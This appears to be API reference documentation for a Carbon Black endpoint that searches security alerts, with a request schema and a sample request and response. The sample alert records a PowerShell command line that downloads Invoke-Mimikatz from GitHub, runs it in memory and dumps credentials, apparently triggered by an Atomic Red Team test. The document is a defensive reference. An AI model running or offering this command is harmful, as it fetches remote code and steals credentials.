Find alerts - Ungrouped
POST {{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search
Alert search request. Multiple pathways support similar request body schemas.
RBAC Permissions Required
Permission (.notation name) | Operation(s) |
---|---|
org.alerts | READ |
Request Schema
{
"query": "<string>",
"time_range": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"criteria": {
"org_key": [
"<string>"
],
"id": [
"<string>"
],
"type": [
"<string>"
],
"backend_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"user_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"backend_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"detection_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"first_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"last_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"category": [
"<string>"
],
"minimum_severity": <integer>,
"reason_code": [
"<string>"
],
"threat_id": [
"<string>"
],
"primary_event_id": [
"<string>"
],
"policy_applied": [
"<string>"
],
"run_state": [
"<string>"
],
"sensor_action": [
"<string>"
],
"workflow_status": [
"<string>"
],
"workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"workflow_changed_by_type": [
"<string>"
],
"workflow_changed_by_autoclose_rule_id": [
"<string>"
],
"workflow_closure_reason": [
"<string>"
],
"determination_value": [
"<string>"
],
"determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"determination_changed_by_type": [
"<string>"
],
"tags": [
"<string>"
],
"alert_notes_present": <boolean>,
"threat_notes_present": <boolean>,
"device_id": [
<long>
],
"device_name": [
"<string>"
],
"device_uem_id": [
"<string>"
],
"device_policy": [
"<string>"
],
"device_policy_id": [
<long>
],
"device_target_value": [
"<string>"
],
"device_os": [
"<string>"
],
"device_os_version": [
"<string>"
],
"device_username": [
"<string>"
],
"device_location": [
"<string>"
],
"device_external_ip": [
"<string>"
],
"device_internal_ip": [
"<string>"
],
"rule_config_type": [
"<string>"
],
"rule_config_name": [
"<string>"
],
"rule_config_id": [
"<string>"
],
"rule_category_id": [
"<string>"
],
"rule_id": [
"<string>"
],
"process_guid": [
"<string>"
],
"process_pid": [
<integer>
],
"process_name": [
"<string>"
],
"process_sha256": [
"<string>"
],
"process_md5": [
"<string>"
],
"process_effective_reputation": [
"<string>"
],
"process_reputation": [
"<string>"
],
"process_cmdline": [
"<string>"
],
"process_username": [
"<string>"
],
"process_signatures_certificate_authority": [
"<string>"
],
"process_signatures_publisher": [
"<string>"
],
"parent_guid": [
"<string>"
],
"parent_pid": [
<integer>
],
"parent_name": [
"<string>"
],
"parent_sha256": [
"<string>"
],
"parent_md5": [
"<string>"
],
"parent_effective_reputation": [
"<string>"
],
"parent_reputation": [
"ADWARE",
"NOT_SUPPORTED"
],
"parent_cmdline": [
"<string>"
],
"parent_username": [
"<string>"
],
"childproc_guid": [
"<string>"
],
"childproc_name": [
"<string>"
],
"childproc_sha256": [
"<string>"
],
"childproc_md5": [
"<string>"
],
"childproc_effective_reputation": [
"<string>"
],
"childproc_username": [
"<string>"
],
"childproc_cmdline": [
"<string>"
],
"netconn_remote_port": [
<integer>
],
"netconn_local_port": [
<integer>
],
"netconn_protocol": [
"<string>"
],
"netconn_remote_domain": [
"<string>"
],
"netconn_remote_ip": [
"<string>"
],
"netconn_local_ip": [
"<string>"
],
"netconn_remote_ipv4": [
"<string>"
],
"netconn_local_ipv4": [
"<string>"
],
"netconn_remote_ipv6": [
"<string>"
],
"netconn_local_ipv6": [
"<string>"
],
"threat_category": [
"<string>"
],
"ttps": [
"<string>"
],
"attack_tactic": [
"<string>"
],
"attack_technique": [
"<string>"
],
"report_id": [
"<string>"
],
"report_name": [
"<string>"
],
"report_link": [
"<string>"
],
"watchlists_id": [
"<string>"
],
"watchlists_name": [
"<string>"
],
"k8s_policy_id": [
"<string>"
],
"k8s_policy": [
"<string>"
],
"k8s_rule_id": [
"<string>"
],
"k8s_rule": [
"<string>"
],
"cluster_name": [
"<string>"
],
"namespace": [
"<string>"
],
"workload_kind": [
"<string>"
],
"workload_name": [
"<string>"
],
"replica_id": [
"<string>"
],
"connection_type": [
"<string>"
],
"egress_group_id": [
"<string>"
],
"egress_group_name": [
"<string>"
],
"ip_reputation": [
<integer>
],
"remote_is_private": <boolean>,
"remote_namespace": [
"<string>"
],
"remote_replica_id": [
"<string>"
],
"remote_workload_kind": [
"<string>"
],
"remote_workload_name": [
"<string>"
],
"tms_rule_id": [
"<string>"
],
"threat_name": [
"<string>"
],
"vendor_name": [
"<string>"
],
"vendor_id": [
"<string>"
],
"product_name": [
"<string>"
],
"product_id": [
"<string>"
],
"external_device_friendly_name": [
"<string>"
],
"serial_number": [
"<string>"
],
"blocked_name": [
"<string>"
],
"blocked_sha256": [
"<string>"
],
"blocked_md5": [
"<string>"
],
"blocked_effective_reputation": [
"<string>"
],
"ml_classification_final_verdict": [
"<string>"
],
"ml_classification_global_prevalence": [
"<string>"
],
"ml_classification_org_prevalence": [
"<string>"
],
"mdr_alert": <boolean>,
"mdr_workflow_status": [
"<string>"
],
"mdr_workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"mdr_workflow_is_assigned": <boolean>,
"mdr_determination_value": [
"<string>"
],
"mdr_determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
}
},
"exclusions": {
"org_key": [
"<string>"
],
"id": [
"<string>"
],
"type": [
"<string>"
],
"backend_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"user_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"backend_update_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"detection_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"first_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"last_event_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"category": [
"<string>"
],
"minimum_severity": <integer>,
"reason_code": [
"<string>"
],
"threat_id": [
"<string>"
],
"primary_event_id": [
"<string>"
],
"policy_applied": [
"<string>"
],
"run_state": [
"<string>"
],
"sensor_action": [
"<string>"
],
"workflow_status": [
"<string>"
],
"workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"workflow_changed_by_type": [
"<string>"
],
"workflow_changed_by_autoclose_rule_id": [
"<string>"
],
"workflow_closure_reason": [
"<string>"
],
"determination_value": [
"NONE"
],
"determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"determination_changed_by_type": [
"<string>"
],
"tags": [
"<string>"
],
"alert_notes_present": <boolean>,
"threat_notes_present": <boolean>,
"device_id": [
<long>
],
"device_name": [
"<string>"
],
"device_uem_id": [
"<string>"
],
"device_policy": [
"<string>"
],
"device_policy_id": [
<long>
],
"device_target_value": [
"<string>"
],
"device_os": [
"<string>"
],
"device_os_version": [
"<string>"
],
"device_username": [
"<string>"
],
"device_location": [
"<string>"
],
"device_external_ip": [
"<string>"
],
"device_internal_ip": [
"<string>"
],
"rule_config_type": [
"<string>"
],
"rule_config_name": [
"<string>"
],
"rule_config_id": [
"<string>"
],
"rule_category_id": [
"<string>"
],
"rule_id": [
"<string>"
],
"process_guid": [
"<string>"
],
"process_pid": [
<integer>
],
"process_name": [
"<string>"
],
"process_sha256": [
"<string>"
],
"process_md5": [
"<string>"
],
"process_effective_reputation": [
"<string>"
],
"process_reputation": [
"<string>"
],
"process_cmdline": [
"<string>"
],
"process_username": [
"<string>"
],
"process_signatures_certificate_authority": [
"<string>"
],
"process_signatures_publisher": [
"<string>"
],
"parent_guid": [
"<string>"
],
"parent_pid": [
<integer>
],
"parent_name": [
"<string>"
],
"parent_sha256": [
"<string>"
],
"parent_md5": [
"<string>"
],
"parent_effective_reputation": [
"<string>"
],
"parent_reputation": [
"<string>"
],
"parent_cmdline": [
"<string>"
],
"parent_username": [
"<string>"
],
"childproc_guid": [
"<string>"
],
"childproc_name": [
"<string>"
],
"childproc_sha256": [
"<string>"
],
"childproc_md5": [
"<string>"
],
"childproc_effective_reputation": [
"<string>"
],
"childproc_username": [
"<string>"
],
"childproc_cmdline": [
"<string>"
],
"netconn_remote_port": [
<integer>
],
"netconn_local_port": [
<integer>
],
"netconn_protocol": [
"<string>"
],
"netconn_remote_domain": [
"<string>"
],
"netconn_remote_ip": [
"<string>"
],
"netconn_local_ip": [
"<string>"
],
"netconn_remote_ipv4": [
"<string>"
],
"netconn_local_ipv4": [
"<string>"
],
"netconn_remote_ipv6": [
"<string>"
],
"netconn_local_ipv6": [
"<string>"
],
"threat_category": [
"<string>"
],
"ttps": [
"<string>"
],
"attack_tactic": [
"<string>"
],
"attack_technique": [
"<string>"
],
"report_id": [
"<string>"
],
"report_name": [
"<string>"
],
"report_link": [
"<string>"
],
"watchlists_id": [
"<string>"
],
"watchlists_name": [
"<string>"
],
"k8s_policy_id": [
"<string>"
],
"k8s_policy": [
"<string>"
],
"k8s_rule_id": [
"<string>"
],
"k8s_rule": [
"<string>"
],
"cluster_name": [
"<string>"
],
"namespace": [
"<string>"
],
"workload_kind": [
"<string>"
],
"workload_name": [
"<string>"
],
"replica_id": [
"<string>"
],
"connection_type": [
"<string>"
],
"egress_group_id": [
"<string>"
],
"egress_group_name": [
"<string>"
],
"ip_reputation": [
<integer>
],
"remote_is_private": <boolean>,
"remote_namespace": [
"<string>"
],
"remote_replica_id": [
"<string>"
],
"remote_workload_kind": [
"<string>"
],
"remote_workload_name": [
"<string>"
],
"tms_rule_id": [
"<string>"
],
"threat_name": [
"<string>"
],
"vendor_name": [
"<string>"
],
"vendor_id": [
"<string>"
],
"product_name": [
"<string>"
],
"product_id": [
"<string>"
],
"external_device_friendly_name": [
"<string>"
],
"serial_number": [
"<string>"
],
"blocked_name": [
"<string>"
],
"blocked_sha256": [
"<string>"
],
"blocked_md5": [
"<string>"
],
"blocked_effective_reputation": [
"<string>"
],
"ml_classification_final_verdict": [
"<string>"
],
"ml_classification_global_prevalence": [
"<string>"
],
"ml_classification_org_prevalence": [
"<string>"
],
"mdr_alert": <boolean>,
"mdr_workflow_status": [
"<string>"
],
"mdr_workflow_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
},
"mdr_workflow_is_assigned": <boolean>,
"mdr_determination_value": [
"<string>"
],
"mdr_determination_change_timestamp": {
"start": "<dateTime>",
"end": "<dateTime>",
"range": "<string>"
}
},
"start": <long>,
"rows": <long>,
"sort": [
{
"field": "<string>",
"order": "DESC"
},
{
"field": "<string>",
"order": "DESC"
}
]
}
Request Body
{"time_range"=>{"range"=>"-2w"}, "criteria"=>{"minimum_severity"=>2, "device_os"=>["WINDOWS"]}, "exclusions"=>{"device_os_version"=>["Windows 10 x64"], "threat_id"=>["7103E507844087BE20351A50D8773029"]}, "start"=>"1", "rows"=>"10", "sort"=>[{"field"=>"severity", "order"=>"DESC"}]}
HEADERS
Key | Datatype | Required | Description |
---|---|---|---|
Content-Type | string | ||
Accept | string |
RESPONSES
status: OK
{"results":[{"org_key":"ABCD1234","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c3fa0b1-36fe-4641-9f87-95128bef94eb\u0026orgKey=ABCD1234","id":"1c3fa0b1-36fe-4641-9f87-95128bef94eb","type":"WATCHLIST","backend_timestamp":"2023-08-06T13:33:47.411Z","user_update_timestamp":null,"backend_update_timestamp":"2023-08-06T13:33:47.411Z","detection_timestamp":"2023-08-06T13:32:59.205Z","first_event_timestamp":"2023-08-06T13:30:17.713Z","last_event_timestamp":"2023-08-06T13:30:17.713Z","severity":10,"reason":"Process powershell.exe was detected by the report \"Execution - AMSI - .Net Loading Suspicious Content Into Memory\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"0f6918d8-98c5-3ed9-9786-b8c6094eeb78:8c25935c-f78b-3ed3-b29e-4ce9c2a42ba0","threat_id":"0F6918D898C58ED9D786B8C6094EEB78","primary_event_id":"DHeFhEvUQCerOi2CvDbWUA-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2023-08-06T13:33:47.411Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2023-08-06T13:33:47.411Z","value":"NONE","changed_by_type":null,"changed_by":null},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":1212123,"device_name":"demo_machine","device_uem_id":"","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows Server 2019 x64","device_username":"demo@demoorg.com","device_location":"UNKNOWN","device_external_ip":"1.2.3.4","device_internal_ip":"5.6.7.8","mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-5f8518fb-3981-44ce-8ab7-b4a4240d50e0","report_name":"Execution - AMSI - .Net Loading Suspicious Content Into Memory","report_description":"An attacker can leverage PowerShell's built-in abilities to access the .Net subsystem in Windows to load arbitrary code into memory. This is a common technique that is used to evade on-host AV scanning by never writing a file to disk and executing payloads directly in memory. You should take immediate action if responding to this alert.","report_tags":["evasion","t1106","t1059","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1106/","ioc_id":"5f8518fb-3981-44ce-8ab7-b4a4240d50e0","ioc_hit":"fileless_scriptload_cmdline:\"[System.Runtime.InteropServices.Marshal]::Copy\" OR scriptload_content:\"[System.Runtime.InteropServices.Marshal]::Copy\"","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"ABCD1234-006a07ff-00000540-00000000-1d9c86a2286f3bc","process_pid":1344,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","process_md5":"7353f60b1739074eb17c5f4dddefe239","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"\"powershell.exe\" \u0026 {IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds}","process_username":"KOGNOS-W19-CB-3\\Administrator","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"ABCD1234-006a07ff-00000dbc-00000000-1d9c86a210c4ece","parent_pid":3516,"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"\"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe\" -c \"cd c:\\ ; echo MYPID=$PID; Get-Date ; Invoke-AtomicTest T1003.001-10 \"","parent_username":"KOGNOS-W19-CB-3\\Administrator","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"NOT_ANOMALOUS","ml_classification_global_prevalence":"MEDIUM","ml_classification_org_prevalence":"LOW"}],"num_found":10995,"num_available":10000}